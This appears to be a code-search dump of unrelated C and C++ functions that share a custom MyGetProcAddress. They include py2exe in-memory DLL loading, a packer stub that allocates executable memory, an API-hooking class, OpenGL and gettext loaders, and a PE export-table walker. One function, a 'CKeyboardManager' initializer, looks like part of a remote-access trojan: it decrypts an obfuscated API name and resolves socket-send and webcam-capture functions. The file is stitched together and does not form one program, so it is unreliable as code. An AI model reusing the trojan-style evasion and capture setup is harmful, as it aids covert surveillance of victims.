int _load_python(char *dllname, char *bytes)
{
int i;
struct IMPORT *p = imports;
HMODULE hmod;
ULONG_PTR cookie = 0;
if (!bytes)
return _load_python_FromFile(dllname);
cookie = _My_ActivateActCtx();//try some windows manifest magic...
//hmod = MemoryLoadLibrary(bytes);
hmod = MyLoadLibrary(dllname, bytes, NULL);
_My_DeactivateActCtx(cookie);
if (hmod == NULL) {
return 0;
}
for (i = 0; p->name; ++i, ++p) {
//p->proc = (void (*)())MemoryGetProcAddress(hmod, p->name);
p->proc = (void (*)())MyGetProcAddress(hmod, p->name);
if (p->proc == NULL) {
OutputDebugString("undef symbol");
dfprint(stderr, "undefined symbol %s -> exit(-1)\n", p->name);
return 0;
}
}
return 1;
}
//************************************************************
// 函数名称: InitFun
// 函数说明: 初始化函数指针和变量
// 作 者: cyxvc
// 时 间: 2015/12/28
// 返 回 值: void
//************************************************************
void InitFun()
{
//从Kenel32中获取函数
HMODULE hKernel32 = GetKernel32Addr();
g_pfnGetProcAddress = (fnGetProcAddress)MyGetProcAddress();
g_pfnLoadLibraryA = (fnLoadLibraryA)g_pfnGetProcAddress(hKernel32, "LoadLibraryA");
g_pfnGetModuleHandleA = (fnGetModuleHandleA)g_pfnGetProcAddress(hKernel32, "GetModuleHandleA");
g_pfnVirtualProtect = (fnVirtualProtect)g_pfnGetProcAddress(hKernel32, "VirtualProtect");
g_pfnExitProcess = (fnExitProcess)g_pfnGetProcAddress(hKernel32, "ExitProcess");
g_pfnVirtualAlloc = (fnVirtualAlloc)g_pfnGetProcAddress(hKernel32, "VirtualAlloc");
//从user32中获取函数
HMODULE hUser32 = g_pfnLoadLibraryA("user32.dll");
g_pfnMessageBoxA = (fnMessageBox)g_pfnGetProcAddress(hUser32, "MessageBoxA");
//初始化镜像基址
dwImageBase = (DWORD)g_pfnGetModuleHandleA(NULL);
//
g_pTRUEIAT = (PDWORD)g_pfnVirtualAlloc(0, sizeof(DWORD)*g_stcShellData.dwNumOfIATFuns,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
dwTemp1 = sizeof(DWORD)+3;
dwTemp2 = sizeof(DWORD)-1;
dwTemp3 = sizeof(DWORD)*sizeof(DWORD)-dwTemp2;
}
ApiHook::ApiHook(LPCTSTR moduleName,
LPCSTR functionName,
LPVOID replacement)
: _installed(false), _reroute(0), _moduleName(moduleName), _functionName(functionName), _bytesMoved(0)
{
HMODULE mh = ::GetModuleHandle(moduleName);
if (mh != nullptr) {
// using custom getprocaddress to avoid tools that hook getprocaddress (like AcLayer)
_origPos = (LPVOID)(MyGetProcAddress(mh, functionName));
} else {
Logger::Instance().error("%s is not a valid module name", moduleName);
throw std::runtime_error("hook failed");
}
if (_origPos == nullptr) {
Logger::Instance().error("%s is not a function in %ls", functionName, moduleName);
throw std::runtime_error("hook failed");
}
_fdisasm.Init(reinterpret_cast<LPBYTE>(_origPos));
if (!Hook(_origPos, replacement)) {
Logger::Instance().error("%s in %s can not be hooked", functionName, moduleName);
throw std::runtime_error("hook failed");
}
_installed = true;
LOGDEBUG("hook for %s installed at %p (trampoline at %p)", functionName, _origPos, _reroute);
}
BOOL CKeyboardManager::MyFuncInitialization()
{
HMODULE hKernel32 = (HMODULE)GetKernelModule();
MyLoadLibrary = (pLoadLibraryA)MyGetProAddress( hKernel32, "LoadLibraryA" );
if (!MyLoadLibrary) return FALSE;
//////////////////////////////////////////////////////////////////////////
//获取GetProcAddress地址
char str1[50] = "7YhLjo[=XXjYkk";
EncryptData((unsigned char *)&str1, ::lstrlen(str1), ENCODEKEY+2);
//////////////////////////////////////////////////////////////////////////
MyGetProcAddress = (pGetProcAddress)MyGetProAddress( hKernel32, str1 );
if (!MyGetProcAddress) return FALSE;
HMODULE hWs2_32 = MyLoadLibrary("Ws2_32.dll");
HMODULE hAVICAP32 = MyLoadLibrary("AVICAP32.dll");
///////////////////////////////////////////////////////////////////////////////////////////////////////
MyGetSystemDirectory = (pGetSystemDirectoryA)MyGetProAddress( hKernel32, "GetSystemDirectoryA" );
if (!MyGetSystemDirectory) return FALSE;
MySleep = (pSleep)MyGetProAddress( hKernel32, "Sleep" );
if (!MySleep) return FALSE;
Mylstrcat = (plstrcatA)MyGetProAddress( hKernel32, "lstrcatA" );
if (!Mylstrcat) return FALSE;
MyGetTempPath = (pGetTempPathA)MyGetProAddress( hKernel32, "GetTempPathA" );
if (!MyGetTempPath) return FALSE;
MySetFilePointer = (pSetFilePointer)MyGetProAddress( hKernel32, "SetFilePointer" );
if (!MySetFilePointer) return FALSE;
MyMoveFile = (pMoveFileA)MyGetProAddress( hKernel32, "MoveFileA" );
if (!MyMoveFile) return FALSE;
MyGetShortPathName = (pGetShortPathNameA)MyGetProAddress( hKernel32, "GetShortPathNameA" );
if (!MyGetShortPathName) return FALSE;
MyGetModuleFileName = (pGetModuleFileNameA)MyGetProAddress( hKernel32, "GetModuleFileNameA" );
if (!MyGetModuleFileName) return FALSE;
///////////////////////////////////////////////////////////////////////////////////////////////////////
Myclosesocket = (pclosesocket)MyGetProcAddress(hWs2_32,"closesocket");
if (!Myclosesocket) return FALSE;
Mysend = (psend)MyGetProcAddress(hWs2_32,"send");
if (!Mysend) return FALSE;
///////////////////////////////////////////////////////////////////////////////////////////////////////
MycapGetDriverDescription = (pcapGetDriverDescriptionA)MyGetProcAddress(hAVICAP32,"capGetDriverDescriptionA");
if (!MycapGetDriverDescription) return FALSE;
MycapCreateCaptureWindow = (pcapCreateCaptureWindowA)MyGetProcAddress(hAVICAP32,"capCreateCaptureWindowA");
if (!MycapCreateCaptureWindow) return FALSE;
return TRUE;
}
//The function to get the pointers.
void* MyGetGLFunctionAddress(const char* functionName)
{
void* result = (void*)MyGetProcAddress(functionName);
//Some drivers return -1, 1, 2 or 3 (instead of 0).
if (result == (void*)-1 || result == (void*)1 || result == (void*)2 || result == (void*)3)
result = (void*)0;
return result;
}
// The function to get the pointers
void* MyGetGLFuncAddress(const char* fname)
{
void* pret = (void*) MyGetProcAddress(fname);
// Some drivers return -apart from 0-, -1, 1, 2 or 3
if ( pret == (void*)-1 || pret == (void*)1 || pret == (void*)2 || pret == (void*)3 )
pret = (void*)0;
return pret;
}
static void deinit_library(HMODULE)
{
#if defined(__AIX__) && defined(__GNUC__)
dlerror(); // Clear the error state.
typedef void (*free_proc_type)();
free_proc_type free_proc =
(free_proc_type)MyGetProcAddress(dll_hand, "_GLOBAL__DD");
if (free_proc)
free_proc();
#endif
}
static PyObject *
import_module(PyObject *self, PyObject *args)
{
char *initfuncname;
char *modname;
char *pathname;
HMODULE hmem;
FARPROC init_func;
ULONG_PTR cookie = 0;
PyObject *findproc;
/* code, initfuncname, fqmodulename, path */
if (!PyArg_ParseTuple(args, "sssO:import_module",
&modname, &pathname,
&initfuncname,
&findproc))
return NULL;
cookie = _My_ActivateActCtx();//try some windows manifest magic...
hmem = MyLoadLibrary(pathname, NULL, findproc);
_My_DeactivateActCtx(cookie);
if (!hmem) {
char *msg;
FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(void *)&msg,
0,
NULL);
msg[strlen(msg)-2] = '\0';
PyErr_Format(PyExc_ImportError,
"MemoryLoadLibrary failed loading %s: %s (%d)",
pathname, msg, GetLastError());
LocalFree(msg);
/* PyErr_Format(PyExc_ImportError, */
/* "MemoryLoadLibrary failed loading %s (Error %d loading %s)", */
/* pathname, GetLastError(), LastErrorString); */
/* PyErr_Format(PyExc_ImportError, */
/* "MemoryLoadLibrary failed loading %s", pathname); */
return NULL;
}
init_func = MyGetProcAddress(hmem, initfuncname);
if (do_import(init_func, modname) < 0) {
MyFreeLibrary(hmem);
return NULL;
}
/* Retrieve from sys.modules */
return PyImport_ImportModule(modname);
}
FARPROC MyFindProcAddress(LPCSTR modulename, LPCSTR procname)
{
HCUSTOMMODULE mod = MyGetModuleHandle(modulename);
void *addr = NULL;
dprintf("MyFindProcAddress(%s, %s) -> %p\n", modulename, procname, mod);
if (mod) {
addr = MyGetProcAddress(mod, procname);
}
dprintf("MyFindProcAddress(%s, %s) -> %p\n", modulename, procname, addr);
return addr;
}
LPVOID MyGetProcAddress(HMODULE module, LPCSTR functionName)
{
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)module;
if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
return nullptr;
}
PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)(((LPBYTE)dosHeader) + dosHeader->e_lfanew);
if (ntHeaders->Signature != IMAGE_NT_SIGNATURE) {
return nullptr;
}
PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader;
PIMAGE_DATA_DIRECTORY dataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((DWORD)dosHeader + dataDirectory->VirtualAddress);
ULONG *addressOfNames = (ULONG*)((BYTE*) module + exportDirectory->AddressOfNames);
ULONG *funcAddr = (ULONG*)((BYTE*) module + exportDirectory->AddressOfFunctions);
for (DWORD i = 0; i < exportDirectory->NumberOfNames; ++i) {
char *curFunctionName = (char*)((BYTE*) module + addressOfNames[i]);
USHORT *nameOrdinals = (USHORT*)((BYTE*) module + exportDirectory->AddressOfNameOrdinals);
if (strcmp(functionName, curFunctionName) == 0) {
if (funcAddr[nameOrdinals[i]] >= dataDirectory->VirtualAddress &&
funcAddr[nameOrdinals[i]] < dataDirectory->VirtualAddress + dataDirectory->Size) {
char *forwardLibName = _strdup((LPSTR)module + funcAddr[nameOrdinals[i]]);
char *forwardFunctionName = strchr(forwardLibName, '.');
*forwardFunctionName = 0;
++forwardFunctionName;
HMODULE forwardLib = ::LoadLibraryA(forwardLibName);
LPVOID forward = nullptr;
if (forwardLib != nullptr) {
forward = MyGetProcAddress(forwardLib, forwardFunctionName);
::FreeLibrary(forwardLib);
}
return forward;
}
return (void*)((BYTE*)module + funcAddr[nameOrdinals[i]]);
}
}
return nullptr;
}
/*
c:\Python34\include\Python.h
PyAPI_DATA(int) Py_DebugFlag;
PyAPI_DATA(int) Py_VerboseFlag;
PyAPI_DATA(int) Py_QuietFlag;
PyAPI_DATA(int) Py_InteractiveFlag;
PyAPI_DATA(int) Py_InspectFlag;
PyAPI_DATA(int) Py_OptimizeFlag;
PyAPI_DATA(int) Py_NoSiteFlag;
PyAPI_DATA(int) Py_BytesWarningFlag;
PyAPI_DATA(int) Py_UseClassExceptionsFlag;
PyAPI_DATA(int) Py_FrozenFlag;
PyAPI_DATA(int) Py_IgnoreEnvironmentFlag;
PyAPI_DATA(int) Py_DontWriteBytecodeFlag;
PyAPI_DATA(int) Py_NoUserSiteDirectory;
PyAPI_DATA(int) Py_UnbufferedStdioFlag;
PyAPI_DATA(int) Py_HashRandomizationFlag;
PyAPI_DATA(int) Py_IsolatedFlag;
*/
void set_vars(HMODULE hmod_pydll)
{
int *pflag;
/* I'm not sure if the unbuffered code really works... */
if (p_script_info->unbuffered) {
_setmode(_fileno(stdin), O_BINARY);
_setmode(_fileno(stdout), O_BINARY);
setvbuf(stdin, (char *)NULL, _IONBF, 0);
setvbuf(stdout, (char *)NULL, _IONBF, 0);
setvbuf(stderr, (char *)NULL, _IONBF, 0);
pflag = (int *)MyGetProcAddress(hmod_pydll, "Py_UnbufferedStdioFlag");
if (pflag) *pflag = 1;
}
pflag = (int *)MyGetProcAddress(hmod_pydll, "Py_IsolatedFlag");
if (pflag) *pflag = 1;
pflag = (int *)MyGetProcAddress(hmod_pydll, "Py_NoSiteFlag");
if (pflag) *pflag = 1;
pflag = (int *)MyGetProcAddress(hmod_pydll, "Py_IgnoreEnvironmentFlag");
if (pflag) *pflag = 1;
pflag = (int *)MyGetProcAddress(hmod_pydll, "Py_NoUserSiteDirectory");
if (pflag) *pflag = 1;
pflag = (int *)MyGetProcAddress(hmod_pydll, "Py_OptimizeFlag");
if (pflag) *pflag = p_script_info->optimize;
pflag = (int *)MyGetProcAddress(hmod_pydll, "Py_VerboseFlag");
if (pflag) {
if (getenv("PY2EXE_VERBOSE"))
*pflag = atoi(getenv("PY2EXE_VERBOSE"));
else
*pflag = 0;
}
}
/****************************************************************
* Helper functions for MemoryLoadLibraryEx
*/
static FARPROC _GetProcAddress(HCUSTOMMODULE module, LPCSTR name, void *userdata)
{
return MyGetProcAddress(module, name);
}
static int
load_dll (void)
{
if (f_hinstDll)
return 1;
if (f_failed)
return 0;
f_failed=1;
memset(&f_gettext_fncs, 0, sizeof(f_gettext_fncs));
if (!f_dllpath[0])
{
/* no requested path, try defaults */
int i;
for (i=0; i<sizeof(f_defaults)/sizeof(f_defaults[0]); ++i)
{
if ((f_hinstDll = LoadLibrary(f_defaults[i]))!=NULL)
{
strncpy(f_dllpath, f_defaults[i], sizeof(f_dllpath));
break;
}
}
}
else
{
f_hinstDll = LoadLibrary(f_dllpath);
}
if (!f_hinstDll)
return 0;
f_gettext_fncs.gettext_x = (gettext_type)MyGetProcAddress(f_hinstDll, "gettext");
f_gettext_fncs.dgettext_x = (dgettext_type)MyGetProcAddress(f_hinstDll, "dgettext");
f_gettext_fncs.dcgettext_x = (dcgettext_type)MyGetProcAddress(f_hinstDll, "dcgettext");
f_gettext_fncs.ngettext_x = (ngettext_type)MyGetProcAddress(f_hinstDll, "ngettext");
f_gettext_fncs.dngettext_x = (dngettext_type)MyGetProcAddress(f_hinstDll, "dngettext");
f_gettext_fncs.dcngettext_x = (dcngettext_type)MyGetProcAddress(f_hinstDll, "dcngettext");
f_gettext_fncs.textdomain_x = (textdomain_type)MyGetProcAddress(f_hinstDll, "textdomain");
f_gettext_fncs.bindtextdomain_x = (bindtextdomain_type)MyGetProcAddress(f_hinstDll, "bindtextdomain");
f_gettext_fncs.bind_textdomain_codeset_x = (bind_textdomain_codeset_type)MyGetProcAddress(f_hinstDll, "bind_textdomain_codeset");
f_gettext_fncs.gt_notify_language_change_x = (gt_notify_language_change_type)MyGetProcAddress(f_hinstDll, "gt_notify_language_change");
f_gettext_fncs.gt_get_property_x = (gt_get_property_type)MyGetProcAddress(f_hinstDll, "gt_get_property");
f_gettext_fncs.gt_set_property_x = (gt_set_property_type)MyGetProcAddress(f_hinstDll, "gt_set_property");
f_failed=0;
return 1;
}
